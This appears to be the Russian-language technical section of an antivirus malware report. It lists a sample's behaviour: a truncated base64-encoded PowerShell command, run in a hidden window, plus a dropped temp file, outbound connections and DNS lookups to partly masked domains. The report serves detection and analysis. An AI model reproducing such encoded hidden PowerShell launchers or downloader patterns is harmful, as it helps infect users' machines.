Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAEIAeABBAGMAQwBVACAAPQAgACcANAAzADEAJwA7ACQAVgBRAGsAQwBaAHcAQQBBAD0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBUAEEAQQBYACcALAAnAEQARwAnACkAOwAkAFkAVQBVAFgAawBBAFgAVQA9ACQAZQBuAHYAOgB1AHMAZQByAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1532
- %TEMP%\949765.cvr
- 'de####ainterior.com':443
- 'de####ainterior.com':443
- DNS ASK de####ainterior.com
- DNS ASK dl###ist.com
- DNS ASK ew#####ciousrecipes.xyz
- DNS ASK cl#####ervico.com.br
- DNS ASK ta#####finstitute.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAEIAeABBAGMAQwBVACAAPQAgACcANAAzADEAJwA7ACQAVgBRAGsAQwBaAHcAQQBBAD0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBUAEEAQQBYACcALAAnAEQARwAnACkAOwAkAFkAVQBVAFgAawBBAFgAVQA9ACQAZQBuAHYAOgB1AHMAZQByAH...' (со скрытым окном)